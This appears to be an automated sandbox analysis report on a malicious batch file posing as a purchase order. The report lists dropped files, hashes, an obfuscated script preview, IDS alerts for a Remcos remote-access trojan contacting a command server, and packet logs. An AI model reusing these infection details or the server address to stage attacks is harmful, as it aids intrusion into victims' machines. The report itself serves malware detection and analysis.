                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.PowerShell.ConsoleHost, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\0827b790b8e74d0d12643297a812ae07\Microsoft.PowerShell.ConsoleHost.ni.dll",0..3,"System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\27947b366dfb4feddb2be787d72ca90d\System.Management.Automation.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d5

                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\json[1].json

                                                                                                                Download File
                                                                                                                Process:C:\Users\Public\Libraries\sppsvc.pif
                                                                                                                File Type:JSON data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):961
                                                                                                                Entropy (8bit):5.006421839568594
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:tkEQnd6UGkMyGWKyGXPVGArwY3TogmayHnmGcArpv/mOAaNO+ao9W7iN5zzkw7La:qPdVauKyGX85JvXhNlT3/7SxDWro
                                                                                                                MD5:45E5FB8A57767E70ABBB831198544CBD
                                                                                                                SHA1:AE58409A68046431B8CEFA156B479D52A42FA04C
                                                                                                                SHA-256:8759C30926404F8E7732BE417797B412C23A897D7DC24D20CF4D87F7BEA04EDB
                                                                                                                SHA-512:10AF734866C2CC4B103526E7D332448041C9354E4E7B142BA1BDCB5471BE81087CED1501E5955C42036E3433066DE6B8B7C516B9B2AFC91BE4C1E34B2201BE67
                                                                                                                Malicious:false
                                                                                                                Preview:{. "geoplugin_request":"102.129.152.220",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Miami",. "geoplugin_region":"Florida",. "geoplugin_regionCode":"FL",. "geoplugin_regionName":"Florida",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"528",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"25.7689",. "geoplugin_longitude":"-80.1946",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                Download File
                                                                                                                Process:C:\Users\Public\xkn.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):64
                                                                                                                Entropy (8bit):1.1940658735648508
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Nlllul1jR:NllU
                                                                                                                MD5:0EC63F8643FAD46EC878DB86E00F7FF5
                                                                                                                SHA1:53D9444F5369A346E09B2E3D95E06D838BD43A52
                                                                                                                SHA-256:E35DD4598E36CB170B240FD08843073B98DD8BDA901C13FCEBC923ABA2EAE934
                                                                                                                SHA-512:EF572FBB9395F9077C737A458960558BDB7CBBDD183001ECEB1ABF4B82784F0B16E3A7BA1F1F3353E73387AEBC28952A198979E10FE3FD13F2064E69DA69677F
                                                                                                                Malicious:false
                                                                                                                Preview:@...e..................................."............@..........

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fdls2d4n.4lb.psm1

                                                                                                                Download File
                                                                                                                Process:C:\Users\Public\xkn.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t3ru4bzt.u0w.ps1

                                                                                                                Download File
                                                                                                                Process:C:\Users\Public\xkn.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 18:56:02 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2677
                                                                                                                Entropy (8bit):3.9810730124670894
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:8jwdQTUUNAHycidAKZdA19ehwiZUklqeh/y+3:8bvNUQy
                                                                                                                MD5:41FC6CAD4B066EE5A3A71A28F9F2BFC0
                                                                                                                SHA1:A3548734E199A65985ACF8A7ADEE443B936DDCBA
                                                                                                                SHA-256:38A2701E028F51C090666C33362D02F69E600A0C6EEB9C74961D6DF3887526E0
                                                                                                                SHA-512:A867894975EA2507334598B777603BE373D1444000D3224511AFA862EA3B01C8FE81B0C845E2C2417233BCD5032A09A74351620537FF8BD53DB8370E111608B8
                                                                                                                Malicious:false
                                                                                                                Preview:L..................F.@.. ...$+.,...../S.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............o.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 18:56:02 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2679
                                                                                                                Entropy (8bit):3.9950126634179273
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:8gwdQTUUNAHycidAKZdA1weh/iZUkAQkqehAy+2:8OvNm9Qhy
                                                                                                                MD5:8E713A83B7FBAE4BF7A0B2E1D5A0B560
                                                                                                                SHA1:C2026D26F8CAA1A5ECCC99501077BF0F1AB99C11
                                                                                                                SHA-256:23A97A2B003C6EE8472EE76C001D7158CCDAA56153FDBE96D4D01610C0B5D92F
                                                                                                                SHA-512:54A2E29630493B79B4C406A2182D9F0BEB73293522DA7C44726DEC0F59E5A5D24D08FA7CC21876AF95FB57D207108D9EF26C50BC6D3B64F8F77C609B4C892CBE
                                                                                                                Malicious:false
                                                                                                                Preview:L..................F.@.. ...$+.,.....CG.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............o.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2693
                                                                                                                Entropy (8bit):4.007092300208588
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:8xKwdQTUUsHycidAKZdA14tseh7sFiZUkmgqeh7siy+BX:8xQvSnMy
                                                                                                                MD5:B9E5A4C0A9D99BC1A3F77F56ED0D32B0
                                                                                                                SHA1:9AFBB3A1D1F7F5543388AB53268F3A35870A3639
                                                                                                                SHA-256:88E379A4BB42DD0DED879B2B8F434D0C17B5FC35CA603FAE78F5DA812B3C6007
                                                                                                                SHA-512:0C408D5ED46D938D0CBED335CEC53457CD3FBD7B8F503B6A38EF56B641A4919B03A13433262248437E7C128259B8C14753F57E1BFE15FED5775DA2FFC4E61E26
                                                                                                                Malicious:false
                                                                                                                Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............o.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 18:56:02 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2681
                                                                                                                Entropy (8bit):3.9943267638383952
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:8iQwdQTUUNAHycidAKZdA1vehDiZUkwqehEy+R:8ievNt6y
                                                                                                                MD5:860838C8C7F7CFA0A39164A0DA581ACD
                                                                                                                SHA1:2CDE0B2DFC6F1EEA9817F62C0E67A47DE23BF87C
                                                                                                                SHA-256:1BC7932590812A596FFF2D2DD9A0D9E7311E87F956604B10EB4B9630FDE4AE8F
                                                                                                                SHA-512:C6252C7431DF481F34DFCF4325347781286C65FA4C219E64697CE785D9F338E6C52D318A56DAED311DB69AF30059081C89B8D9256A076007E443DDF0C99F3601
                                                                                                                Malicious:false
                                                                                                                Preview:L..................F.@.. ...$+.,....\.B.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............o.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 18:56:02 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2681
                                                                                                                Entropy (8bit):3.9834847146215777
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:87wdQTUUNAHycidAKZdA1hehBiZUk1W1qehuy+C:8zvNt9Oy
                                                                                                                MD5:D48E920E1AD289DBCCD02979355C4044
                                                                                                                SHA1:5F1FDBA03E36F4579A543C5D8639B66E818F35C7
                                                                                                                SHA-256:6D8C811EA0026E5F480D24EC0DDF0CC4601C2F8F6644D93E2661833553EEACEC
                                                                                                                SHA-512:3E615D8A02003A0F9E2052898AE09B3795F1D1713BEBEC119E06FCC2ABD3E72BF4E32BF06A0EABE1F5BD5587C9A373CA839FB9C4AC3C77C13397982347B88BDB
                                                                                                                Malicious:false
                                                                                                                Preview:L..................F.@.. ...$+.,....3kN.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............o.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 18:56:02 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2683
                                                                                                                Entropy (8bit):3.9956547720426796
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:8iwdQTUUNAHycidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbMy+yT+:8IvNxT/TbxWOvTbMy7T
                                                                                                                MD5:888B9BAC5816B33B97867A8A03123AB7
                                                                                                                SHA1:3172CCCEAFC0AA9ECED71848A59319CDACAD7A39
                                                                                                                SHA-256:864A0BAA9337E4D0D7D8B5916DA60CAF792F1B754523841F3F9F56ECCA714D2E
                                                                                                                SHA-512:A5F5A50ECC41715AC33F5A7639CA830348A8D02A55A65945EFCB963F7FC3454737C9F1D8B246B6D8BC615CFB74627165F9479806B55F3EEACFBFB9BCDCA596B5
                                                                                                                Malicious:false
                                                                                                                Preview:L..................F.@.. ...$+.,......5.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............o.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                Chrome Cache Entry: 100

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:ASCII text, with very long lines (773)
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):778
                                                                                                                Entropy (8bit):5.139784303307584
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:pM8DMGkoRpHRBHslgT9lCuABuoB7HHHHHHHYqmffffffo:i8QGkwHRKlgZ01BuSEqmffffffo
                                                                                                                MD5:598FA3BFA22B098EA89CAFEF09C9E2BE
                                                                                                                SHA1:B549A68710A4A74DF9AF7991C327A3C928B4DE84
                                                                                                                SHA-256:7B3D1884CE328B615566624823F7DA5C2C8D212268E3A05D05E5A765560871BD
                                                                                                                SHA-512:9A1FC6643F69A7A2F3C8117D89E526E58B2865050376848BB28DCEA6FBCDAAA6BDCBC3A2A40CCE370C007C6FE00F7ECDD2EBC8C899D8F3D1E9E4BCBDA6E66ADD
                                                                                                                Malicious:false
                                                                                                                URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                Preview:)]}'.["",["blizzard canceled blizzcon","lord of the rings in theaters 2024","usc graduation ceremony","bucs draft picks","layoffs bristol myers squibb","chicago bears nfl draft picks 2024","stellar blade ign","laguardia airport"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]

                                                                                                                \Device\Null

                                                                                                                Download File
                                                                                                                Process:C:\Users\Public\alpha.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):104
                                                                                                                Entropy (8bit):4.403504238247217
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:HnRthLK5aTRECUAdROGCOwXWnjTRrGIAOFZRMQcv:HRoAREYTOGjHVF+
                                                                                                                MD5:E14D0D771A7FEB9D78EA3DCA9197BA2A
                                                                                                                SHA1:48E363AAD601D9073D803AA9D224BF9A7FC39119
                                                                                                                SHA-256:0C13A861207709C246F13ACE164529F31F2F91CF14BD37795192D5B37E965BE6
                                                                                                                SHA-512:3460F93FEA31D68E49B1B82EDCB8A2A9FCCE34910DD04DEE7BD7503DB8DAB6D1D5C73CBD2C15156DCB601512AD68DE6FEF7DCB8F8A72A8A0747248B378C17CF9
                                                                                                                Malicious:false
                                                                                                                Preview:The system cannot find message text for message number 0x400023a1 in the message file for Application...

                                                                                                                Static File Info

                                                                                                                General

                                                                                                                File type:Unicode text, UTF-8 text, with very long lines (3004), with CRLF line terminators
                                                                                                                Entropy (8bit):4.975920910175679
                                                                                                                TrID:
                                                                                                                  File name:Purchase Order is approved26042024.cmd
                                                                                                                  File size:4'050'655 bytes
                                                                                                                  MD5:8d5ff3734fb8dddaf133ff8ef662aa1d
                                                                                                                  SHA1:08f0f2978d3c989b0b6ce03a804a6b0cfc0453b6
                                                                                                                  SHA256:0874f8f4032c3a90a16ad54d23d9ef6c47b1a5a3c1056cbe125e6ed1846cf94c
                                                                                                                  SHA512:65dadad068eb9d865f622753f4102deabac9306794d3d72aeced54e56c3f6936fc994a40c9725212c834c294911beb6b0fd39a5abb3d3eaff582478e6307a13e
                                                                                                                  SSDEEP:49152:c0yPIMFC7s8sc5R6AlCpwKwyKI+mI/VqWxNchKlWB/3cx6nyJaKnImlWdgwC1B75:r
                                                                                                                  TLSH:7616B6D339AF19471709775BF39FAF7B0B5FC8114A87AFD84CC20988602AA4F1990B59
                                                                                                                  File Content Preview:@%..................%e%...... ..........%c%...... %h% ............%o%...% %.. ................%o% %f%...... ............%f%........ ...... ..%..C% ..........%:%........%\%.. ..%\%.... .... ......%W% .. ..%i%...... ....%n%............ ....%d%..........%

                                                                                                                  File Icon

                                                                                                                  Icon Hash:9686878b929a9886

                                                                                                                  Network Behavior

                                                                                                                  Snort IDS Alerts

                                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                  04/26/24-21:56:24.593602TCP2032776ET TROJAN Remcos 3.x Unencrypted Checkin497309231192.168.2.583.137.157.85
                                                                                                                  04/26/24-21:58:37.300504TCP2032777ET TROJAN Remcos 3.x Unencrypted Server Response92314973083.137.157.85192.168.2.5

                                                                                                                  Network Port Distribution

                                                                                                                  TCP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Apr 26, 2024 21:55:51.785234928 CEST49675443192.168.2.523.1.237.91
                                                                                                                  Apr 26, 2024 21:55:51.785238981 CEST49674443192.168.2.523.1.237.91
                                                                                                                  Apr 26, 2024 21:55:51.894617081 CEST49673443192.168.2.523.1.237.91
                                                                                                                  Apr 26, 2024 21:55:59.984474897 CEST49707443192.168.2.5142.250.64.196
                                                                                                                  Apr 26, 2024 21:55:59.984519005 CEST44349707142.250.64.196192.168.2.5
                                                                                                                  Apr 26, 2024 21:55:59.984654903 CEST49707443192.168.2.5142.250.64.196
                                                                                                                  Apr 26, 2024 21:55:59.984954119 CEST49707443192.168.2.5142.250.64.196
                                                                                                                  Apr 26, 2024 21:55:59.984966993 CEST44349707142.250.64.196192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:00.060039043 CEST49708443192.168.2.5142.250.64.196
                                                                                                                  Apr 26, 2024 21:56:00.060089111 CEST44349708142.250.64.196192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:00.060162067 CEST49708443192.168.2.5142.250.64.196
                                                                                                                  Apr 26, 2024 21:56:00.060420990 CEST49709443192.168.2.5142.250.64.196
                                                                                                                  Apr 26, 2024 21:56:00.060462952 CEST44349709142.250.64.196192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:00.060530901 CEST49709443192.168.2.5142.250.64.196
                                                                                                                  Apr 26, 2024 21:56:00.060666084 CEST49708443192.168.2.5142.250.64.196
                                                                                                                  Apr 26, 2024 21:56:00.060679913 CEST44349708142.250.64.196192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:00.060816050 CEST49709443192.168.2.5142.250.64.196
                                                                                                                  Apr 26, 2024 21:56:00.060832024 CEST44349709142.250.64.196192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:00.061310053 CEST49710443192.168.2.5142.250.64.196
                                                                                                                  Apr 26, 2024 21:56:00.061335087 CEST44349710142.250.64.196192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:00.061386108 CEST49710443192.168.2.5142.250.64.196
                                                                                                                  Apr 26, 2024 21:56:00.061830044 CEST49710443192.168.2.5142.250.64.196
                                                                                                                  Apr 26, 2024 21:56:00.061845064 CEST44349710142.250.64.196192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:00.398320913 CEST44349708142.250.64.196192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:00.399235010 CEST44349710142.250.64.196192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:00.399830103 CEST49708443192.168.2.5142.250.64.196
                                                                                                                  Apr 26, 2024 21:56:00.399849892 CEST44349708142.250.64.196192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:00.400105000 CEST49710443192.168.2.5142.250.64.196
                                                                                                                  Apr 26, 2024 21:56:00.400125027 CEST44349710142.250.64.196192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:00.401161909 CEST44349708142.250.64.196192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:00.401206970 CEST44349710142.250.64.196192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:00.401221037 CEST49708443192.168.2.5142.250.64.196
                                                                                                                  Apr 26, 2024 21:56:00.401271105 CEST49710443192.168.2.5142.250.64.196
                                                                                                                  Apr 26, 2024 21:56:00.401765108 CEST44349709142.250.64.196192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:00.402872086 CEST49710443192.168.2.5142.250.64.196
                                                                                                                  Apr 26, 2024 21:56:00.402941942 CEST44349710142.250.64.196192.168.2.5
